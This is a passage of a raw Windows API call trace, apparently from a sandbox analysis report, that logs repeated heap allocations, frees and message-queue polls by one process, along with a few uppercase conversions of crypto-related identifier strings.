hHeap=0x8a0000) returned 1 [0191.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0191.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0191.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0191.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0191.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0191.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0191.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0191.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.732] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0191.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0191.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0191.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0191.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0191.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0191.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0191.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0191.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0191.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0191.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0191.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0191.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0191.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b058 [0191.733] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0191.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0191.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0191.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0191.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4a0 [0191.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0191.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0191.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0191.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0191.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0191.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0191.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0191.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0191.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0191.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0191.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0191.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0191.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0191.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0191.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0191.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0191.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0191.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0191.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0191.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0191.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0191.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0191.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0191.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0191.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0191.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0191.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0191.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0191.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0191.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0191.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0191.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0191.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0191.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0191.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0191.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0191.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0191.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0191.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0191.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0191.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0191.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0191.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0191.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0191.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0191.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0191.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0191.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0191.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0191.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0191.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0191.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0191.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0191.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0191.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0191.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0191.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0191.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0191.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0191.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0191.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0191.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0191.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0191.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0191.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0191.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0191.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0191.739] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0191.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0191.739] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0191.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0191.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0191.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0191.739] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0191.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0191.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.739] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0191.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0191.739] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0191.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0191.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0191.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0191.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0191.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0191.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0191.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0191.740] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.740] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0191.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.740] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0191.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0191.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0191.740] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0191.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0191.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0191.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0191.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0191.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0191.741] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0191.741] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0191.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0191.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0191.741] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0191.741] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0191.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0191.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0191.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0191.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b058 [0191.741] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 